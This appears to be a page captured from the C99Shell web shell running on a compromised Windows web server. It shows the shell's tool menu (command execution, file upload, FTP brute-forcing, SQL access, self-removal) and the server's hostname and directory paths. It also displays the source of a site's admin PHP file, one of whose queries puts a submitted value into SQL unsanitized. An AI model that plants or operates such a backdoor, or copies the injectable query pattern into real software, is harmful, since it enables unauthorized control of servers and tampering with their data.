!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\htdocs\BLA2\boletinlegal\admin\usuarios\admin\   drwxrwxrwx
Free 1.09 GB of 239.26 GB (0.45%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     adminprocess.php (6.32 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * AdminProcess.php
 * 
 * The AdminProcess class is meant to simplify the task of processing
 * admin submitted forms from the admin center, these deal with
 * member system adjustments.
 *
 * Written by: Jpmaster77 a.k.a. The Grandmaster of C++ (GMC)
 * Last Updated: August 15, 2004
 */
include("../include/session.php");

class 
AdminProcess
{
   
/* Class constructor */
   
function AdminProcess(){
      global 
$session;
      
/* Make sure administrator is accessing page */
      
if(!$session->isAdmin()){
         
header("Location: ../index.php");
         return;
      }
      
/* Admin submitted update user level form */
      
if(isset($_POST['subupdlevel'])){
         
$this->procUpdateLevel();
      }
      
/* Admin submitted delete user form */
      
else if(isset($_POST['subdeluser'])){
         
$this->procDeleteUser();
      }
      
/* Admin submitted delete inactive users form */
      
else if(isset($_POST['subdelinact'])){
         
$this->procDeleteInactive();
      }
      
/* Admin submitted ban user form */
      
else if(isset($_POST['subbanuser'])){
         
$this->procBanUser();
      }
      
/* Admin submitted delete banned user form */
      
else if(isset($_POST['subdelbanned'])){
         
$this->procDeleteBannedUser();
      }
      
/* Should not get here, redirect to home page */
      
else{
         
header("Location: ../index.php");
      }
   }

   
/**
    * procUpdateLevel - If the submitted username is correct,
    * their user level is updated according to the admin's
    * request.
    */
   
function procUpdateLevel(){
      global 
$session$database$form;
      
/* Username error checking */
      
$subuser $this->checkUsername("upduser");
      
      
/* Errors exist, have user correct them */
      
if($form->num_errors 0){
         
$_SESSION['value_array'] = $_POST;
         
$_SESSION['error_array'] = $form->getErrorArray();
         
header("Location: ".$session->referrer);
      }
      
/* Update user level */
      
else{
         
$database->updateUserField($subuser"userlevel", (int)$_POST['updlevel']);
         
header("Location: ".$session->referrer);
      }
   }
   
   
/**
    * procDeleteUser - If the submitted username is correct,
    * the user is deleted from the database.
    */
   
function procDeleteUser(){
      global 
$session$database$form;
      
/* Username error checking */
      
$subuser $this->checkUsername("deluser");
      
      
/* Errors exist, have user correct them */
      
if($form->num_errors 0){
         
$_SESSION['value_array'] = $_POST;
         
$_SESSION['error_array'] = $form->getErrorArray();
         
header("Location: ".$session->referrer);
      }
      
/* Delete user from database */
      
else{
         
$q "DELETE FROM ".TBL_USERS." WHERE username = '$subuser'";
         
$database->query($q);
         
header("Location: ".$session->referrer);
      }
   }
   
   
/**
    * procDeleteInactive - All inactive users are deleted from
    * the database, not including administrators. Inactivity
    * is defined by the number of days specified that have
    * gone by that the user has not logged in.
    */
   
function procDeleteInactive(){
      global 
$session$database;
      
$inact_time $session->time $_POST['inactdays']*24*60*60;
      
$q "DELETE FROM ".TBL_USERS." WHERE timestamp < $inact_time "
          
."AND userlevel != ".ADMIN_LEVEL;
      
$database->query($q);
      
header("Location: ".$session->referrer);
   }
   
   
/**
    * procBanUser - If the submitted username is correct,
    * the user is banned from the member system, which entails
    * removing the username from the users table and adding
    * it to the banned users table.
    */
   
function procBanUser(){
      global 
$session$database$form;
      
/* Username error checking */
      
$subuser $this->checkUsername("banuser");
      
      
/* Errors exist, have user correct them */
      
if($form->num_errors 0){
         
$_SESSION['value_array'] = $_POST;
         
$_SESSION['error_array'] = $form->getErrorArray();
         
header("Location: ".$session->referrer);
      }
      
/* Ban user from member system */
      
else{
         
$q "DELETE FROM ".TBL_USERS." WHERE username = '$subuser'";
         
$database->query($q);

         
$q "INSERT INTO ".TBL_BANNED_USERS." VALUES ('$subuser', $session->time)";
         
$database->query($q);
         
header("Location: ".$session->referrer);
      }
   }
   
   
/**
    * procDeleteBannedUser - If the submitted username is correct,
    * the user is deleted from the banned users table, which
    * enables someone to register with that username again.
    */
   
function procDeleteBannedUser(){
      global 
$session$database$form;
      
/* Username error checking */
      
$subuser $this->checkUsername("delbanuser"true);
      
      
/* Errors exist, have user correct them */
      
if($form->num_errors 0){
         
$_SESSION['value_array'] = $_POST;
         
$_SESSION['error_array'] = $form->getErrorArray();
         
header("Location: ".$session->referrer);
      }
      
/* Delete user from database */
      
else{
         
$q "DELETE FROM ".TBL_BANNED_USERS." WHERE username = '$subuser'";
         
$database->query($q);
         
header("Location: ".$session->referrer);
      }
   }
   
   
/**
    * checkUsername - Helper function for the above processing,
    * it makes sure the submitted username is valid, if not,
    * it adds the appropritate error to the form.
    */
   
function checkUsername($uname$ban=false){
      global 
$database$form;
      
/* Username error checking */
      
$subuser $_POST[$uname];
      
$field $uname;  //Use field name for username
      
if(!$subuser || strlen($subuser trim($subuser)) == 0){
         
$form->setError($field"* Username not entered<br>");
      }
      else{
         
/* Make sure username is in database */
         
$subuser stripslashes($subuser);
         if(
strlen($subuser) < || strlen($subuser) > 30 ||
            !
eregi("^([0-9a-z])+$"$subuser) ||
            (!
$ban && !$database->usernameTaken($subuser))){
            
$form->setError($field"* Username does not exist<br>");
         }
      }
      return 
$subuser;
   }
};

/* Initialize process */
$adminprocess = new AdminProcess;

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--